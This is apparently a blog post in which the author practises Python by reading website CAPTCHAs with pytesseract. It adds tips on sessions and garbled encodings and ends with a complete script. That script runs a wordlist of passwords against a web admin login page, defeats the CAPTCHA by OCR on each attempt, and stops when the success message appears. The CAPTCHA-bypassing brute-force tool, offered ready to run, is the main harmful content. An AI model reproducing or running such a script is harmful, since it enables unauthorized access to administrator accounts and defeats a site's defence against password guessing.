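I wanted to practice Python but couldn't think of anything to write...
A Baidu search told me the pytesseract library is reasonably good at recognizing CAPTCHAs, so I decided to give it a try.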
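Result:
Recognition was disappointing: only about one in ten fetched CAPTCHAs was read correctly. Preprocessing the images myself improved that somewhat.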
Environment:
Tesseract OCR engine
PIL (installed today as the Pillow package)
pytesseract
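Before starting, it can help to confirm that all three pieces are in place. The sketch below is a hypothetical `check_environment()` helper that uses only the standard library. It assumes the Tesseract program is named `tesseract` and is on `PATH`, which is what pytesseract calls by default, since pytesseract only wraps that command-line program.

```python
import importlib.util
import shutil


def check_environment():
    """Report which parts of the OCR toolchain are available (hypothetical helper)."""
    return {
        # pytesseract shells out to the tesseract binary, so it must be findable on PATH
        "tesseract": shutil.which("tesseract") is not None,
        # PIL is provided by the Pillow package on current Python versions
        "PIL": importlib.util.find_spec("PIL") is not None,
        "pytesseract": importlib.util.find_spec("pytesseract") is not None,
    }


if __name__ == "__main__":
    for name, ok in check_environment().items():
        print("%-12s %s" % (name, "OK" if ok else "missing"))
```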
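Step 1:
Fetch the current CAPTCHA. This stumped me at first: the image URL points to a PHP file, and I didn't know how to download a picture from it. After some searching on Baidu and some experimenting, I found that as long as the same session is kept, requesting the PHP file directly returns the image that must be submitted with the current login. Just save resp.content to a .jpg file.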
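The download can be sketched as below, with a quick check that the PHP script really returned an image and not an HTML page. This is a minimal sketch: `fetch_captcha` and `sniff_image_type` are hypothetical helpers, and the session object is assumed to behave like `requests.Session` (a `get()` whose result has `.content`). PIL identifies a file's format from its contents rather than its extension, so saving a PNG under a `.jpg` name still opens correctly.

```python
# Magic bytes at the start of common image formats
_SIGNATURES = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def sniff_image_type(data):
    """Return 'jpeg', 'png' or 'gif' based on the leading bytes, or None if unrecognized."""
    for magic, kind in _SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def fetch_captcha(session, captcha_url, path):
    """Download the CAPTCHA with an existing session and save it to path (hypothetical helper).

    The same session should later submit the login form: PHP CAPTCHAs are
    typically checked against a value stored in the server-side session.
    """
    resp = session.get(captcha_url)
    kind = sniff_image_type(resp.content)
    if kind is None:
        # An HTML page instead of image bytes usually means a wrong URL or a lost session
        raise ValueError("response from %s is not a JPEG/PNG/GIF image" % captcha_url)
    with open(path, "wb") as f:
        f.write(resp.content)
    return kind


# Usage (assumes the requests library; the PHP path is elided as in the post):
#   import requests
#   s = requests.Session()
#   fetch_captcha(s, url + "/include/xxx.php", "img.jpg")
```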
Step 2:
Learn how to recognize a CAPTCHA with pytesseract:
```python
from PIL import Image
import pytesseract

image = Image.open('v1.jpg')
print(pytesseract.image_to_string(image))
```
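The post says that processing the image yourself raises the hit rate a little, without saying how. One common approach, shown here as an assumption rather than the author's method, is to convert the image to grayscale and binarize it so that faint background noise drops out before OCR. `threshold_table` and `preprocess` are hypothetical helpers, and the threshold of 140 is an arbitrary starting point to tune per site.

```python
def threshold_table(threshold=140):
    """Lookup table for PIL's Image.point(): values below threshold -> 0 (black), others -> 255."""
    return [0 if v < threshold else 255 for v in range(256)]


def preprocess(path, threshold=140):
    """Grayscale and binarize a CAPTCHA image before OCR (hypothetical helper)."""
    from PIL import Image  # imported here so threshold_table() works without Pillow installed

    gray = Image.open(path).convert("L")           # "L" = 8-bit grayscale
    return gray.point(threshold_table(threshold))  # map every pixel through the table


# Usage (assumes Pillow and pytesseract are installed):
#   import pytesseract
#   print(pytesseract.image_to_string(preprocess("v1.jpg")))
```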
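Step 3:
Think through the whole flow one step at a time, and break the functionality into small functions where possible to keep the code tidy and readable (for me, readable is good enough...).
The requests library makes it easy to keep a session. Here is how, plus one way to deal with garbled (mojibake) text: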
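```python
import requests

s = requests.Session()  # cookies persist across every request made through s
resp = s.post(url, data=..., headers=...)
resp.encoding = resp.apparent_encoding  # decode resp.text with the charset detected from the bytes
```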
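The garbling happens because, when a `text/*` response has no charset in its `Content-Type` header, requests decodes `resp.text` as ISO-8859-1, which turns GBK or UTF-8 Chinese into nonsense; `apparent_encoding` instead guesses the charset from the bytes. If you already know which encodings a site may use, a standard-library alternative is to try them in order. `decode_with_fallback` below is a hypothetical helper, sketched under that assumption.

```python
def decode_with_fallback(raw, encodings=("utf-8", "gbk")):
    """Decode bytes with the first encoding that succeeds (hypothetical helper).

    UTF-8 goes first: its strict byte rules make false positives rare, whereas
    many UTF-8 byte sequences also happen to be valid GBK.
    """
    for enc in encodings:
        try:
            return raw.decode(enc)
        except UnicodeDecodeError:
            continue
    # Nothing decoded cleanly: fall back to the first encoding with replacement characters
    return raw.decode(encodings[0], errors="replace")


# Usage with requests:  text = decode_with_fallback(resp.content)
```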
Here is the full code. If you know a better way to handle any of this, I'd be glad to hear it.
```python
#coding:utf-8
import time
from optparse import OptionParser

import pytesseract
import requests
from PIL import Image


def cmdParse():
    """Read -f (dictionary file), -u (user name) and --url from the command line."""
    parser = OptionParser()
    parser.add_option("-f", dest="dicPath", default=False, help="dict file path")
    parser.add_option("-u", dest="user", default=False, help="user name")
    parser.add_option("--url", dest="url", default=False, help="The data post url. Like www.baidu.com")
    (option, args) = parser.parse_args()
    return option.dicPath, option.url, option.user


def Analysis():
    """OCR the saved CAPTCHA image and return the recognized text."""
    image = Image.open("/root/img.jpg")
    # image_to_string() usually appends whitespace/newlines; strip them before submitting
    return pytesseract.image_to_string(image).strip()


def Payload(user, pwd, vaCode):
    """Login form fields for the target page."""
    return {"userid": user, "pwd": pwd, "gotopage": "xxx",
            "dopost": "xxx", "adminstyle": "xxx", "validate": vaCode}


def header():
    return {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0'}


def imgSave(s, url):
    """Fetch the current CAPTCHA through session s and save it to disk."""
    urlCode = url + "/include/xxx.php"
    resp = s.get(urlCode)
    with open("/root/img.jpg", "wb") as f:
        f.write(resp.content)


def main():
    i = 1
    xing = "*"
    truePwd = "......"
    dicPath, url, user = cmdParse()
    urlLogin = url + "/xxx/login.php"
    s = requests.Session()  # one session, so the CAPTCHA and the login POST share cookies
    with open(dicPath) as dic:
        for line in dic:
            pwd = line.strip()  # drop the trailing newline from each dictionary line
            imgSave(s, url)
            vaCode = Analysis()
            resp = s.post(urlLogin, data=Payload(user, pwd, vaCode), headers=header())
            resp.encoding = resp.apparent_encoding
            print(resp.text)
            print("%d %s" % (i, xing * 40))
            # Success message: "Logged in successfully, redirecting to the admin home page!"
            if u"成功登录,正在转向管理管理主页!" in resp.text:
                truePwd = pwd
                break
            print("testing ........")
            if i % 5 == 0:
                time.sleep(1)  # pause for a second every 5 attempts
            i = i + 1
    if truePwd != "......":
        print(truePwd)


if __name__ == '__main__':
    main()
```
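`cmdParse()` uses `optparse`; its standard-library successor is `argparse`. The sketch below is a hypothetical `cmd_parse()` that returns the same `(dicPath, url, user)` tuple. With `required=True`, a missing option stops the script with a usage message, whereas with `default=False` a missing `--url` only fails later, when `url + "/xxx/login.php"` raises a `TypeError`.

```python
import argparse


def cmd_parse(argv=None):
    """argparse version of cmdParse(); returns (dicPath, url, user). Hypothetical helper."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-f", dest="dicPath", required=True, help="dict file path")
    parser.add_argument("-u", dest="user", required=True, help="user name")
    parser.add_argument("--url", required=True, help="The data post url. Like www.baidu.com")
    args = parser.parse_args(argv)  # argv=None means "use sys.argv[1:]"
    return args.dicPath, args.url, args.user
```

Passing an explicit list, as in `cmd_parse(["-f", "dict.txt", "-u", "admin", "--url", "http://example.com"])`, makes the parser easy to exercise without touching the real command line.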